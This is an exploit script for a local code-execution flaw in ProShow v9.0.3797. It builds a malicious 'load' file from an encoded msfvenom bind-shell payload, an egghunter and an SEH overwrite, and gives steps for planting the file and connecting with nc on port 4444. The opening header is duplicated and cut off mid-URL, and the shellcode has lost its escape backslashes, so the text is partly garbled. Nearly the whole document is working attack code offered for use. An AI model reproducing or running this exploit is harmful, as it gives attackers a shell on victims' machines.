ProShow 9.0.3797 Privilege Escalation

#!/usr/bin/python
# _*_ coding:utf-8 _*_

# Exploit Title: ProShow v9.0.3797 Local Exploit
# Exploit Author: @Yonatan_Correa
# website with details: https://risata #!/usr/bin/python
# _*_ coding:utf-8 _*_

# Exploit Title: ProShow v9.0.3797 Local Exploit
# Exploit Author: @Yonatan_Correa
# website with details: https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html
# Vendor Homepage: http://www.photodex.com/ProShow
# Software Link: http://files.photodex.com/release/pspro_90_3797.exe
# Version: v9.0.3797
# Tested on: Wind 7

from struct import pack

informacion = """

ProShow v9.0.3797
http://www.photodex.com/ProShow


execute exploit
create a file called "load"
copy load "C:Program FilesPhotodexProShow Producer"
"C:Program FilesPhotodexProShow Producerproshow.exe"
And connect nc -nv IP_Host 4444

Testing: Windows 7
@Yonatan_Correa
https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html
"""


# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -e x86/alpha_mixed LPORT=4444 EXITFUNC=seh -f c
# Payload size: 717 bytes
shell = "yonayona" + ("x89xe5xdaxc2xd9x75xf4x5ax4ax4ax4ax4ax4ax4ax4a"
"x4ax4ax4ax4ax43x43x43x43x43x43x37x52x59x6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x6b"
"x4cx59x78x4fx72x57x70x65x50x45x50x53x50x6dx59"
"x39x75x75x61x4fx30x45x34x6cx4bx30x50x66x50x6e"
"x6bx30x52x74x4cx6ex6bx36x32x77x64x6cx4bx72x52"
"x36x48x66x6fx4cx77x42x6ax46x46x75x61x79x6fx4e"
"x4cx55x6cx50x61x51x6cx55x52x64x6cx77x50x79x51"
"x38x4fx36x6dx53x31x79x57x4ax42x49x62x42x72x42"
"x77x4ex6bx32x72x64x50x4ex6bx71x5ax55x6cx4cx4b"
"x32x6cx37x61x31x68x79x73x43x78x67x71x58x51x52"
"x71x4cx4bx51x49x65x70x43x31x68x53x4cx4bx70x49"
"x42x38x4ax43x47x4ax71x59x6cx4bx76x54x6ex6bx53"
"x31x4ex36x64x71x79x6fx4cx6cx69x51x38x4fx66x6d"
"x67x71x48x47x56x58x6dx30x64x35x38x76x65x53x53"
"x4dx59x68x35x6bx73x4dx65x74x54x35x58x64x72x78"
"x4cx4bx52x78x46x44x76x61x58x53x35x36x4cx4bx56"
"x6cx50x4bx4ex6bx30x58x57x6cx57x71x49x43x4ex6b"
"x75x54x4ex6bx56x61x48x50x4fx79x42x64x75x74x64"
"x64x61x4bx43x6bx33x51x43x69x50x5ax73x61x69x6f"
"x6bx50x63x6fx53x6fx32x7ax6cx4bx47x62x5ax4bx4c"
"x4dx71x4dx43x58x70x33x77x42x35x50x53x30x35x38"
"x63x47x43x43x34x72x61x4fx46x34x71x78x62x6cx51"
"x67x67x56x73x37x39x6fx58x55x68x38x4ax30x67x71"
"x33x30x35x50x76x49x78x44x46x34x36x30x62x48x46"
"x49x6bx30x50x6bx65x50x79x6fx48x55x43x5ax37x78"
"x50x59x62x70x5ax42x4bx4dx51x50x70x50x73x70x30"
"x50x61x78x4bx5ax44x4fx39x4fx39x70x69x6fx68x55"
"x4dx47x70x68x77x72x43x30x47x61x73x6cx4fx79x4d"
"x36x52x4ax66x70x31x46x61x47x35x38x69x52x39x4b"
"x44x77x73x57x69x6fx6bx65x76x37x71x78x78x37x4a"
"x49x64x78x39x6fx79x6fx79x45x62x77x62x48x54x34"
"x78x6cx57x4bx79x71x79x6fx5ax75x63x67x4ex77x33"
"x58x30x75x32x4ex70x4dx33x51x59x6fx6ax75x65x38"
"x53x53x50x6dx71x74x47x70x4bx39x6ax43x61x47x76"
"x37x36x37x76x51x6bx46x72x4ax37x62x52x79x63x66"
"x7ax42x6bx4dx61x76x6fx37x32x64x55x74x45x6cx76"
"x61x75x51x4ex6dx43x74x77x54x34x50x49x56x47x70"
"x51x54x32x74x56x30x62x76x73x66x52x76x43x76x56"
"x36x62x6ex50x56x71x46x53x63x51x46x61x78x52x59"
"x5ax6cx67x4fx4dx56x59x6fx6ex35x6cx49x6dx30x70"
"x4ex71x46x61x56x79x6fx44x70x45x38x56x68x4cx47"
"x45x4dx75x30x6bx4fx79x45x4dx6bx4bx4ex76x6ex54"
"x72x48x6ax35x38x59x36x5ax35x6dx6dx6dx4dx49x6f"
"x6ex35x55x6cx36x66x43x4cx44x4ax4dx50x59x6bx6b"
"x50x72x55x75x55x6fx4bx32x67x74x53x74x32x70x6f"
"x72x4ax73x30x52x73x39x6fx59x45x41x41")

junk = shell + ("x41" * 9479) # 10204
nseh = "xEBx06x90x90"
seh = pack('<I',0x10045f50) # pop pop ret
nop = "x90" * 86
nop2 = "x90" * 10

egg = ("x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74"
"xefxb8x79x6fx6ex61x8bxfaxafx75xeaxafx75xe7xffxe7")

todo = junk + nseh + seh + nop + egg + nop2

arch = open("load", "wb")
arch.write(todo)
arch.close()

print informacion
print " Created File size " + str(len(todo))